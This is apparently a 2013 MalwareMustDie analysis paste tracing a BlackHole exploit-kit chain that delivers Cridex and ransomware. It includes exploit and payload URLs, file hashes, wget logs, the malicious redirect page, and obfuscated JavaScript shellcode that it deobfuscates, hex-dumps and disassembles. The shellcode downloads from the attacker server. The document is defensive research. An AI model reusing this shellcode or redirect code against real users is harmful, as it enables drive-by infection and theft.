#MMD - BlackHole EK w/GeoIP Double infector(Cridex+Ransomer)

MalwareMustDie, Feb 18th, 2013
===================================================
#MalwareMustDie!
BlackHole Exploit Kit with Double infector:
Cridex & FakeAV/Ransomer (depends on your request IP)
Infector: h00p://webworks.investorship.co.jp/page-329.htm
Landing page/BHEK: h00p://46.175.224.21:8080/forum/links/public_version.php
All of the cracked infector download URLs:
//JARS
..using the applet at the same URL as the landing page (2 JARS found)
//PDF:
h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33&gtaaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
//SWF
h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
//Payloads:
h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i
h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r

The catches:
--------------
2013/02/18  15:08 2e9e095f7f276c495a0080b656e81d72   94,208 about.exe
2013/02/18  15:54 80930719764cb6c41840156800ee54f9    7,981 flash1.swf
2013/02/18  15:57 46dd4ea1cdb58bb38488cfbddf40a7cd    1,030 flash2.swf
2013/02/18  15:55 80930719764cb6c41840156800ee54f9    7,981 flash3.swf
2013/02/18  15:57 46dd4ea1cdb58bb38488cfbddf40a7cd    1,030 flash4.swf
2013/02/18  14:31 04022dd9cb3b5c236ec1e0e07d1a6ec1   13,873 java1.jar
2013/02/18  14:33 36df7f936b42abe2ccff75544f08f9f2   12,968 java2.jar
2013/02/18  13:54 96c6c9a9346a360d07236d5bd021adc1      434 page-329.htm
2013/02/18  15:50 6cfb52ab36855801313742a90593c6ec   20,161 pdf1.pdf
2013/02/18  15:50 40e02231bf9ffe321289cccae0191fd4   11,194 pdf2.pdf
2013/02/18  15:51 a57fcffb1040048e63b9f81b6ec096bf   20,161 pdf3.pdf
2013/02/18  15:52 df86cbbc78748287e62be9a1248711ea   11,160 pdf4.pdf
2013/02/18  14:13 b5de89429d354f138d59673e88907b3b  118,326 public_version-2..php
2013/02/18  14:16 a5acd12a633e01d575976de4423b8642  118,301 public_version.php
2013/02/18  15:08 04e9d4167c9a1b82e622e04ad85f8e99  279,040 readme.exe
-----
Total: 2 SWF, 4 PDF, 2 Jars, 2 Payloads

Infector found by @Hulk_Crusader, followed: @unixfreaxjp, GeoIP analysis: @it4sec
=================================================================
  46.  
// infector:

h00p://webworks.investorship.co.jp/page-329.htm

--2013-02-18 14:11:12--  h00p://webworks.investorship.co.jp/page-329.htm
Resolving webworks.investorship.co.jp... seconds 0.00, 117.20.100.110
Caching webworks.investorship.co.jp => 117.20.100.110
Connecting to webworks.investorship.co.jp|117.20.100.110|:80... seconds 0.00, connected.
  :
GET /page-329.htm h00p/1.0
Host: webworks.investorship.co.jp
h00p request sent, awaiting response...
  :
h00p/1.1 200 OK
Date: Mon, 18 Feb 2013 05:11:05 GMT
Server: Apache
Last-Modified: Mon, 18 Feb 2013 04:54:14 GMT
ETag: "1185062d-1b2-5121b3f6"
Accept-Ranges: bytes
Content-Length: 434
Connection: close
Content-Type: text/html
  :
200 OK
Length: 434 [text/html]
Saving to: `page-329.htm'
2013-02-18 14:11:12 (9.15 MB/s) - `page-329.htm' saved [434/434]


//-------cat---------------

<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>


<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://46.175.224.21:8080/forum/links/public_version.php";}
</script>


</body>
</html>

// -----------landing page/is a BHEK moronz.----------------------


--2013-02-18 14:13:40--  h00p://46.175.224.21:8080/forum/links/public_version.php
seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
   :
GET /forum/links/public_version.php http/1.0
Referer: h00p://webworks.investorship.co.jp/page-329.htm
Host: 46.175.224.21:8080
http request sent, awaiting response...
  :
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 05:13:34 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding

http/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 05:16:04 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
200 OK
Length: unspecified [text/html]
Saving to: `public_version.php'
2013-02-18 14:16:13 (95.7 KB/s) - `public_version.php' saved [118301]


// -----------------checks the jars..---------------------


// get java old....

--2013-02-18 14:31:39--  h00p://46.175.224.21:8080/forum/links/public_version.php
seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
  :
GET /forum/links/public_version.php http/1.0
User-Agent: Java/1.6.0_23
Host: 46.175.224.21:8080
h00p request sent, awaiting response...
  :
h00p/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 05:31:33 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 13873
ETag: "04022dd9cb3b5c236ec1e0e07d1a6ec1"
Last-Modified: Mon, 18 Feb 2013 05:31:33 GMT
Accept-Ranges: bytes
  :
200 OK
Length: 13873 (14K) [application/java-archive]
Saving to: `java1.jar'
2013-02-18 14:31:41 (21.7 KB/s) - `java1.jar' saved [13873/13873]


// get java newer...

--2013-02-18 14:33:22--  h00p://46.175.224.21:8080/forum/links/public_version.php
seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
  :
GET /forum/links/public_version.php http/1.0
User-Agent: Java/1.7.0_09
Host: 46.175.224.21:8080
h00p request sent, awaiting response...
  :
h00p/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 05:33:15 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 12968
ETag: "36df7f936b42abe2ccff75544f08f9f2"
Last-Modified: Mon, 18 Feb 2013 05:33:15 GMT
Accept-Ranges: bytes
  :
200 OK
Length: 12968 (13K) [application/java-archive]
Saving to: `./java2.jar'
2013-02-18 14:33:23 (41.0 KB/s) - `./java2.jar' saved [12968/12968]


// -------------------------------------------------------

// see both plugin-detects....
// it has different shellcodes... two payloads...
// has 2 PDF, 2 SWF, 2 JARS each payload
// PD1.txt      : http://pastebin.com/raw.php?i=CpRXS5m3
// and PD2.txt  : http://pastebin.com/raw.php?i=MkYVRz4R
// ==========================================================================

// ========================================
// get the deobs + crack both shellcodes:
// ========================================

  198.  
var a = "8200!%1482!%0451!%e024!%5185!%7415!%34e0!%5191!%e0c5!%9114!%7421!%2191!%9164!%7421!%2191!%9114!%f421!%2191!%9144!%a121!%21b1!%b1b1!%2421!%5191!%24d4!%e4e0!%2191!%b1a1!%2421!%2191!%9124!%0421!%5191!%64e4!%8571!%8504!%6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
var xxx=  a["replace"](/\%!/g, "%" + "u");
document.write(xxx);

var b = "8200!%a582!%e551!%e0e5!%5185!%5404!%34e0!%5191!%e095!%9174!%2421!%2191!%b191!%3421!%2191!%9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%f5d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%c5e4!%8571!%8504!%6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
var yyy=  b["replace"](/\%!/g, "%" + "u");
document.write("\n\n"+yyy);
  206.  
// output:

%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u03e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1e1c%u1906%u1d1f%u1a06%u1c1a%u1a06%u1219%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u5807%u4a5d%u4144%u774b%u4d5e%u5b5a%u4741%u0646%u4058%u1758%u4e46%u1915%u1240%u4219%u1912%u1242%u1a1b%u1912%u0e4e%u4d42%u1915%u1242%u1b1b%u1b12%u121a%u4419%u1912%u124f%u4119%u1912%u1247%u4619%u1912%u1247%u4119%u5c0e%u1915%u0e43%u5147%u5815%u420e%u1540%u2841%u0028

%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u03e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1e1c%u1906%u1d1f%u1a06%u1c1a%u1a06%u1219%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u5807%u4a5d%u4144%u774b%u4d5e%u5b5a%u4741%u0646%u4058%u1758%u4e5c%u1b15%u1218%u4619%u1912%u1241%u4119%u1b12%u0e1b%u4d5f%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u590e%u1915%u0e43%u4045%u5815%u5e0e%u155e%u285a%u0028

  213.  
// ========================
// shellcode analysis...
// ========================

// break the eggs... no text...one time...

// raws...

// view...
41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81  AAAAf......X1.f.
e9 03 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff  ....0(@.........
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3  ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04  X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3  ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3  .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4  \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b  .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3  .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3  $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b  +..vq..{..@..U$.
5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7  \+....@...B-q...
d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28  .....((((pxBh@.(
28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d  ((x..1x}...v8..-
d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab  ..@GF((@]ZDE|.>.
ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c  .....I....*.Z..,
29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c  )((.t.$.,.ZMO[.l
0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40  .,^Z...l....[.{@
d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28  .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21  _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28  (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e  {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3  ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42  ;o..(].o..(].B(B
d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2  ..~.......f&....
26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07  &.G)....s3.nQ.2.
58 40 5c 5c 58 12 07 07  1c 1e 06 19 1f 1d 06 1a  X@\\X...........
1a 1c 06 1a 19 12 10 18  10 18 07 4e 47 5a 5d 45  ...........NGZ]E
07 44 41 46 43 5b 07 58  5d 4a 44 41 4b 77 5e 4d  .DAFC[.X]JDAKw^M
5a 5b 41 47 46 06 58 40  58 17 5c 4e 15 1b 18 12  Z[AGF.X@X.\N....
19 46 12 19 41 12 19 41  12 1b 1b 0e 5f 4d 15 1a  .F..A..A...._M..
5e 12 19 43 12 19 45 12  1b 1a 12 1b 1b 12 19 43  ^..C..E........C
12 19 43 12 1b 19 12 19  42 12 19 47 0e 59 15 19  ..C.....B..G.Y..
43 0e 45 40 15 58 0e 5e  5e 15 5a 28 28 00        C.E@.X.^^.Z((.

//disasm..
00000000  41                inc ecx
00000001  41                inc ecx
00000002  41                inc ecx
00000003  41                inc ecx
00000004  8366FCE4          and dword [esi-0x4],byte -0x1c
00000008  EBFC              jmp short 0x6 ; loop
0000000A  58                pop eax
0000000B  10C9              adc cl,cl
0000000D  31816603E980      xor [ecx-0x7f16fc9a],eax ; decryption
00000013  FE                db 0xfe
00000014  2830              sub [eax],dh ; math
00000016  E240              loop 0x58 ; loop
00000018  EBFA              jmp short 0x14 ; loop
0000001A  E805FFEBFF        call dword 0xffebff24 ; call
0000001F  FFCC              dec esp
00000021  AD                lodsd
00000022  1C5D              sbb al,0x5d
00000024  77C1              ja 0xffffffe7
00000026  E81BA34C18        call dword 0x184ca346 ; call
0000002B  6868A3A324        push dword 0x24a3a368
00000030  3458              xor al,0x58 ; decryption
00000032  A37E205EF3        mov [0xf35e207e],eax
00000037  1BA34E14765C      sbb esp,[ebx+0x5c76144e]
0000003D  2B041B            sub eax,[ebx+ebx] ; math
00000040  C6                db 0xc6
00000041  A9383DD7D7        test eax,0xd7d73d38
00000046  A39018686E        mov [0x6e681890],eax
0000004B  EB2E              jmp short 0x7b ; loop
0000004D  11D3              adc ebx,edx
0000004F  5D                pop ebp
00000050  1CAF              sbb al,0xaf
00000052  AD                lodsd
00000053  0C5D              or al,0x5d
00000055  CC                int3
00000056  C17964C3          sar dword [ecx+0x64],0xc3
0000005A  7E79              jng 0xd5
0000005C  5D                pop ebp
0000005D  A3A3141D5C        mov [0x5c1d14a3],eax
00000062  2B507E            sub edx,[eax+0x7e] ; math
00000065  DD5EA3            fstp qword [esi-0x5d]
00000068  2B08              sub ecx,[eax] ; math
0000006A  1BDD              sbb ebx,ebp
0000006C  61                popad
0000006D  E1D4              loope 0x43
0000006F  692B851BED27      imul ebp,[ebx],dword 0x27ed1b85
00000075  F33896DA10205C    rep cmp [esi+0x5c2010da],dl
0000007C  E3E9              jecxz 0x67
0000007E  2B2568F2D9C3      sub esp,[dword 0xc3d9f268] ; math
00000084  37                aaa
00000085  13CE              adc ecx,esi
00000087  5D                pop ebp
00000088  A3760C76F5        mov [0xf5760c76],eax
0000008D  2BA34E63246E      sub esp,[ebx+0x6e24634e] ; math
00000093  A5                movsd
00000094  D7                xlatb
00000095  C40C7C            les ecx,[esp+edi*2]
00000098  A3242BF0A3        mov [0xa3f02b24],eax
0000009D  F5                cmc
0000009E  A32CED2B76        mov [0x762bed2c],eax
000000A3  83EB71            sub ebx,byte +0x71 ; math
000000A6  7BC3              jpo 0x6b
000000A8  A385084055        mov [0x55400885],eax
000000AD  A81B              test al,0x1b
000000AF  242B              and al,0x2b
000000B1  5C                pop esp
000000B2  C3                ret
000000B3  BEA3DB2040        mov esi,0x4020dba3
000000B8  DFA32D42C071      fbld tword [ebx+0x71c0422d]
000000BE  D7                xlatb
000000BF  B0D7              mov al,0xd7
000000C1  D7                xlatb
000000C2  D1CA              ror edx,1 ; bitwise cipher
000000C4  28C0              sub al,al ; math
000000C6  2828              sub [eax],ch ; math
000000C8  7028              jo 0xf2
000000CA  42                inc edx
000000CB  7840              js 0x10d
000000CD  6828D72828        push dword 0x2828d728
000000D2  AB                stosd
000000D3  7831              js 0x106
000000D5  E87D78C4A3        call dword 0xa3c47957 ; call
000000DA  76A3              jna 0x7f
000000DC  AB                stosd
000000DD  382DEBCBD747      cmp [dword 0x47d7cbeb],ch
000000E3  40                inc eax
000000E4  284640            sub [esi+0x40],al ; math
000000E7  285A5D            sub [edx+0x5d],bl ; math
000000EA  45                inc ebp
000000EB  44                inc esp
000000EC  D7                xlatb
000000ED  7CAB              jl 0x9a
000000EF  3E20EC            ds and ah,ch
000000F2  C0A349C0D7D7C3    shl byte [ebx-0x28283fb7],0xc3
000000F9  D7                xlatb
000000FA  C3                ret
000000FB  2AA95A2CC428      sub ch,[ecx+0x28c42c5a] ; math
00000101  29A5280C74EF      sub [ebp-0x108bf3d8],esp ; math
00000107  240C              and al,0xc
00000109  2C4D              sub al,0x4d ; math
0000010B  5A                pop edx
0000010C  5B                pop ebx
0000010D  4F                dec edi
0000010E  6C                insb
0000010F  EF                out dx,eax
00000110  2C0C              sub al,0xc ; math
00000112  5A                pop edx
00000113  5E                pop esi
00000114  1A1B              sbb bl,[ebx]
00000116  6C                insb
00000117  EF                out dx,eax
00000118  200C0508085B40    and [eax+0x405b0808],cl
0000011F  7B28              jpo 0x149
00000121  D028              shr byte [eax],1
00000123  287ED7            sub [esi-0x29],bh ; math
00000126  A3241BC079        mov [0x79c01b24],eax
0000012B  E16C              loope 0x199
0000012D  EF                out dx,eax
0000012E  2835585F5C4A      sub [dword 0x4a5c5f58],dh ; math
00000134  6C                insb
00000135  EF                out dx,eax
00000136  2D354C0644        sub eax,0x44064c35 ; math
0000013B  44                inc esp
0000013C  6C                insb
0000013D  EE                out dx,al
0000013E  21357128E9A2      and [dword 0xa2e92871],esi
00000144  182C6C            sbb [esp+ebp*2],ch
00000147  A02C357969        mov al,[0x6979352c]
0000014C  284228            sub [edx+0x28],al ; math
0000014F  42                inc edx
00000150  7F7B              jg 0x1cd
00000152  28427E            sub [edx+0x7e],al ; math
00000155  D7                xlatb
00000156  AD                lodsd
00000157  3C5D              cmp al,0x5d
00000159  E8423E7B28        call dword 0x287b3fa0 ; call
0000015E  7ED7              jng 0x137
00000160  42                inc edx
00000161  2CAB              sub al,0xab ; math
00000163  2824C3            sub [ebx+eax*8],ah ; math
00000166  D7                xlatb
00000167  7B2C              jpo 0x195
00000169  7EEB              jng 0x156
0000016B  AB                stosd
0000016C  C3                ret
0000016D  24C3              and al,0xc3
0000016F  2A6F3B            sub ch,[edi+0x3b] ; math
00000172  17                pop ss
00000173  A85D              test al,0x5d
00000175  286FD2            sub [edi-0x2e],ch ; math
00000178  17                pop ss
00000179  A85D              test al,0x5d
0000017B  2842EC            sub [edx-0x14],al ; math
0000017E  42                inc edx
0000017F  28D7              sub bh,dl ; math
00000181  D6                salc
00000182  207EB4            and [esi-0x4c],bh
00000185  C0D7D6            rcl bh,0xd6
00000188  A6                cmpsb
00000189  D7                xlatb
0000018A  2666B0C4          es o16 mov al,0xc4
0000018E  A2D6A12629        mov [0x2926a1d6],al
00000193  47                inc edi
00000194  1B95A2E23373      sbb edx,[ebp+0x7333e2a2]
0000019A  6E                outsb
0000019B  EE                out dx,al
0000019C  1E                push ds
0000019D  51                push ecx
0000019E  07                pop es
0000019F  324058            xor al,[eax+0x58] ; decryption
000001A2  5C                pop esp
000001A3  5C                pop esp
000001A4  125807            adc bl,[eax+0x7]
000001A7  07                pop es
000001A8  1E                push ds
000001A9  1C19              sbb al,0x19
000001AB  06                push es
000001AC  1D1F1A061C        sbb eax,0x1c061a1f
000001B1  1A1A              sbb bl,[edx]
000001B3  06                push es
000001B4  1219              adc bl,[ecx]
000001B6  1810              sbb [eax],dl
000001B8  1810              sbb [eax],dl
000001BA  4E                dec esi
000001BB  07                pop es
000001BC  5A                pop edx
000001BD  47                inc edi
000001BE  45                inc ebp
000001BF  5D                pop ebp
000001C0  44                inc esp
000001C1  07                pop es
000001C2  46                inc esi
000001C3  41                inc ecx
000001C4  5B                pop ebx
000001C5  43                inc ebx
